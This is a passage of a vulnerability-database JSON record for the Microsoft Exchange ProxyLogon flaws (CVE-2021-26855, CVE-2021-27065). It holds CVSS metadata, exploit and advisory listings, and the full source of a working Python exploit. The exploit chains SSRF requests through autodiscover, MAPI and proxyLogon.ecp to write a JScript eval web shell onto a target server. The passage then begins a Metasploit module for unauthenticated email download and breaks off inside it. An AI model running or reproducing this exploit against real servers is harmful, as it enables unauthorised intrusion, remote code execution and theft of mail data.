"published": "2021-03-03T00:11:09", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2021-07-27T21:19:37", "id": "256984DC-A742-53F8-889F-2071EC134734", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-20T23:32:16", "description": "# CVE-2021-26855-SSRF-Poc\nThis script helps to identify CVE-202...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-06T19:03:00", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2022-07-20T17:22:39", "id": "C87EF7D4-0E85-54CD-9D5A-381C451E5511", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-09T16:56:27", "description": "# Microsoft_Exchange_Server_SSRF_CVE-2021-26855\n\n**zoomeye dork\uff1a...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-06T09:15:55", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2022-08-09T05:55:45", "id": "7F4F3321-8955-51B4-B195-7C1F647A6C84", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-14T14:30:56", "description": "# CVE-2021-26855_Exchange RCE\n\n> **\u672c\u6587\u4ee5\u53ca\u5de5\u5177...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-18T00:44:29", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2022-08-14T07:03:16", "id": "71E27C48-EAFE-5FC0-98A4-BE7276D47449", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T08:59:28", "description": "# SharpProxyLogon\n\nC# POC for the ProxyLogon chained RCE\n\n```\n _...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-29T21:10:34", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2022-07-27T12:36:24", "id": "18D647E9-D7D4-5591-B16C-05D007AFD726", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-14T13:06:24", "description": "# CVE-2021-26855\nPoC of proxylogon chain SSRF(CVE-2021-26855) to...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-11T20:51:48", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2022-07-14T10:32:08", "id": "0DE16A64-9ACA-5BBE-A315-A3AE1B013900", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:19:57", "description": "Disclaimer: All the information provided in this repository is f...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-16T10:14:56", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26857", "CVE-2021-26855"], "modified": "2021-03-24T16:54:40", "id": "7275794A-F2F6-51E6-B514-185E494D8A3F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-15T15:36:14", "description": "# CVE-2021-26855_SSRF\nCVE-2021-26855 Exchange ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-08T07:28:21", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26857", "CVE-2021-26855", "CVE-2021-26865", "CVE-2021-26858"], "modified": "2021-12-15T14:41:36", "id": "35B21CE7-1E51-5824-B70E-36480A6E8763", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-12T13:06:47", "description": "# HAFNIUM-IOC\nHafnium-IOC is a simple PowerShell script that run...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-03T17:36:18", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26858", "CVE-2021-26857", "CVE-2021-26865"], "modified": "2022-01-12T11:59:39", "id": "72EF4B3F-6CF3-5E4D-9B05-D4E27A7A9D1A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:35:14", "description": "A remote code execution vulnerability exists in Microsoft Microsoft Exchange. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-02T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Exchange Server Remote Code Execution (CVE-2021-26855; CVE-2021-27065)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2021-03-11T00:00:00", "id": "CPAI-2021-0099", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:35:14", "description": "A remote code execution vulnerability exists in VMware View Planner. The vulnerability is due to improper validation of HTTP request to logupload endpoint. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-14T00:00:00", "type": "checkpoint_advisories", "title": "VMware View Planner Remote Code Execution (CVE-2021-21978)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21978"], "modified": "2021-03-14T00:00:00", "id": "CPAI-2021-0148", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-09-22T06:55:42", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-11T00:00:00", "type": "zdt", "title": "Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon) Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26855"], "modified": "2021-03-11T00:00:00", "id": "1337DAY-ID-35944", "href": "https://0day.today/exploit/description/35944", "sourceData": "# Exploit Title: Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon)\r\n# Date: 2021-03-10\r\n# Exploit Author: testanull\r\n# Vendor Homepage: https://www.microsoft.com\r\n# Version: MS Exchange Server 2013, 2016, 2019\r\n# CVE: 2021-26855, 2021-27065\r\n\r\nimport requests\r\nfrom urllib3.exceptions import InsecureRequestWarning\r\nimport random\r\nimport string\r\nimport sys\r\n\r\n\r\ndef id_generator(size=6, chars=string.ascii_lowercase + string.digits):\r\n return ''.join(random.choice(chars) for _ in range(size))\r\n\r\nif len(sys.argv) < 2:\r\n\tprint(\"Usage: python PoC.py <target> <email>\")\r\n\tprint(\"Example: python PoC.py mail.evil.corp [email\u00a0protected]\")\r\n\texit()\r\nrequests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)\r\ntarget = sys.argv[1]\r\nemail = sys.argv[2]\r\nrandom_name = id_generator(3) + \".js\"\r\nuser_agent = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36\"\r\n\r\nshell_path = \"Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth\\\\ahihi.aspx\"\r\nshell_absolute_path = \"\\\\\\\\127.0.0.1\\\\c$\\\\%s\" % shell_path\r\n\r\nshell_content = '<script language=\"JScript\" runat=\"server\"> function Page_Load(){/**/eval(Request[\"exec_code\"],\"unsafe\");}</script>'\r\nlegacyDnPatchByte = \"68747470733a2f2f696d6775722e636f6d2f612f7a54646e5378670a0a0a0a0a0a0a0a\"\r\nautoDiscoverBody = \"\"\"<Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\">\r\n <Request>\r\n <EMailAddress>%s</EMailAddress> <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>\r\n </Request>\r\n</Autodiscover>\r\n\"\"\" % email\r\n\r\nprint(\"Attacking target \" + target)\r\nprint(\"=============================\")\r\nprint(legacyDnPatchByte.decode('hex'))\r\nFQDN = \"EXCHANGE\"\r\nct = requests.get(\"https://%s/ecp/%s\" % (target, random_name), headers={\"Cookie\": \"X-BEResource=localhost~1942062522\",\r\n \"User-Agent\": user_agent},\r\n verify=False)\r\nif \"X-CalculatedBETarget\" in ct.headers and \"X-FEServer\" in ct.headers:\r\n FQDN = ct.headers[\"X-FEServer\"]\r\n\r\nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={\r\n \"Cookie\": \"X-BEResource=%s/autodiscover/autodiscover.xml?a=~1942062522;\" % FQDN,\r\n \"Content-Type\": \"text/xml\",\r\n \"User-Agent\": user_agent},\r\n data=autoDiscoverBody,\r\n verify=False\r\n )\r\nif ct.status_code != 200:\r\n print(\"Autodiscover Error!\")\r\n exit()\r\nif \"<LegacyDN>\" not in ct.content:\r\n print(\"Can not get LegacyDN!\")\r\n exit()\r\n\r\nlegacyDn = ct.content.split(\"<LegacyDN>\")[1].split(\"</LegacyDN>\")[0]\r\nprint(\"Got DN: \" + legacyDn)\r\n\r\nmapi_body = legacyDn + \"\\x00\\x00\\x00\\x00\\x00\\xe4\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\r\nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={\r\n \"Cookie\": \"[email\u00a0protected]%s:444/mapi/[email\u00a0protected]ab&a=~1942062522;\" % FQDN,\r\n \"Content-Type\": \"application/mapi-http\",\r\n \"User-Agent\": user_agent\r\n},\r\n data=mapi_body,\r\n verify=False\r\n )\r\nif ct.status_code != 200 or \"act as owner of a UserMailbox\" not in ct.content:\r\n print(\"Mapi Error!\")\r\n exit()\r\n\r\nsid = ct.content.split(\"with SID \")[1].split(\" and MasterAccountSid\")[0]\r\n\r\nprint(\"Got SID: \" + sid)\r\n\r\nproxyLogon_request = \"\"\"<r at=\"Negotiate\" ln=\"john\"><s>%s</s><s a=\"7\" t=\"1\">S-1-1-0</s><s a=\"7\" t=\"1\">S-1-5-2</s><s a=\"7\" t=\"1\">S-1-5-11</s><s a=\"7\" t=\"1\">S-1-5-15</s><s a=\"3221225479\" t=\"1\">S-1-5-5-0-6948923</s></r>\r\n\"\"\" % sid\r\n\r\nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={\r\n \"Cookie\": \"[email\u00a0protected]%s:444/ecp/proxyLogon.ecp?a=~1942062522;\" % FQDN,\r\n \"Content-Type\": \"text/xml\",\r\n \"User-Agent\": user_agent\r\n},\r\n data=proxyLogon_request,\r\n verify=False\r\n )\r\nif ct.status_code != 241 or not \"set-cookie\" in ct.headers:\r\n print(\"Proxylogon Error!\")\r\n exit()\r\n\r\nsess_id = ct.headers['set-cookie'].split(\"ASP.NET_SessionId=\")[1].split(\";\")[0]\r\n\r\nmsExchEcpCanary = ct.headers['set-cookie'].split(\"msExchEcpCanary=\")[1].split(\";\")[0]\r\nprint(\"Got session id: \" + sess_id)\r\nprint(\"Got canary: \" + msExchEcpCanary)\r\n\r\nct = requests.get(\"https://%s/ecp/%s\" % (target, random_name), headers={\r\n \"Cookie\": \"[email\u00a0protected]%s:444/ecp/about.aspx?a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % (\r\n FQDN, sess_id, msExchEcpCanary),\r\n \"User-Agent\": user_agent\r\n},\r\n verify=False\r\n )\r\nif ct.status_code != 200:\r\n print(\"Wrong canary!\")\r\n print(\"Sometime we can skip this ...\")\r\nrbacRole = ct.content.split(\"RBAC roles:</span> <span class='diagTxt'>\")[1].split(\"</span>\")[0]\r\n# print \"Got rbacRole: \"+ rbacRole\r\n\r\nprint(\"=========== It means good to go!!!====\")\r\n\r\nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={\r\n \"Cookie\": \"[email\u00a0protected]%s:444/ecp/DDI/DDIService.svc/GetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % (\r\n FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),\r\n \"Content-Type\": \"application/json; charset=utf-8\",\r\n \"User-Agent\": user_agent\r\n\r\n},\r\n json={\"filter\": {\r\n \"Parameters\": {\"__type\": \"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel\",\r\n \"SelectedView\": \"\", \"SelectedVDirType\": \"All\"}}, \"sort\": {}},\r\n verify=False\r\n )\r\nif ct.status_code != 200:\r\n print(\"GetOAB Error!\")\r\n exit()\r\noabId = ct.content.split('\"RawIdentity\":\"')[1].split('\"')[0]\r\nprint(\"Got OAB id: \" + oabId)\r\n\r\noab_json = {\"identity\": {\"__type\": \"Identity:ECP\", \"DisplayName\": \"OAB (Default Web Site)\", \"RawIdentity\": oabId},\r\n \"properties\": {\r\n \"Parameters\": {\"__type\": \"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel\",\r\n \"ExternalUrl\": \"http://ffff/#%s\" % shell_content}}}\r\n\r\nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={\r\n \"Cookie\": \"[email\u00a0protected]%s:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % (\r\n FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),\r\n \"Content-Type\": \"application/json; charset=utf-8\",\r\n \"User-Agent\": user_agent\r\n},\r\n json=oab_json,\r\n verify=False\r\n )\r\nif ct.status_code != 200:\r\n print(\"Set external url Error!\")\r\n exit()\r\n\r\nreset_oab_body = {\"identity\": {\"__type\": \"Identity:ECP\", \"DisplayName\": \"OAB (Default Web Site)\", \"RawIdentity\": oabId},\r\n \"properties\": {\r\n \"Parameters\": {\"__type\": \"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel\",\r\n \"FilePathName\": shell_absolute_path}}}\r\n\r\nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={\r\n \"Cookie\": \"[email\u00a0protected]%s:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % (\r\n FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),\r\n \"Content-Type\": \"application/json; charset=utf-8\",\r\n \"User-Agent\": user_agent\r\n},\r\n json=reset_oab_body,\r\n verify=False\r\n )\r\n\r\nif ct.status_code != 200:\r\n print(\"Write Shell Error!\")\r\n exit()\r\n\r\nprint(\"Successful!\")\n\n# 0day.today [2021-09-22] #", "sourceHref": "https://0day.today/exploit/35944", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-09T12:40:16", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-21T00:00:00", "type": "zdt", "title": "Microsoft Exchange 2019 - Unauthenticated Email Download Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26855"], "modified": "2021-05-21T00:00:00", "id": "1337DAY-ID-36281", "href": "https://0day.today/exploit/description/36281", "sourceData": "# Exploit Title: Microsoft Exchange 2019 - Unauthenticated Email Download (Metasploit)\n# Exploit Author: RAMELLA S\u00e9bastien\n# Vendor Homepage: https://microsoft.com\n# Version: This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012,\n Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009,\n Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010).\n# Tested on: Microsoft Windows 2012 R2 - Exchange 2016\n\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n# begin auxiliary class\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Exchange ProxyLogon Collector',\n 'Description' => %q{\n This module scan for a vulnerability on Microsoft Exchange Server that\n allows an attacker bypassing the authentication and impersonating as the\n admin (CVE-2021-26855).\n\n By chaining this bug with another post-auth arbitrary-file-write\n vulnerability to get code execution (CVE-2021-27065).\n\n As a result, an unauthenticated attacker can execute arbitrary commands on\n Microsoft Exchange Server.\n\n This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012,\n Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009,\n Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010).\n\n All components are vulnerable by default.\n },\n 'Author' => [\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Module author (Zeop Entreprise)\n ],\n 'References' => [\n ['CVE', 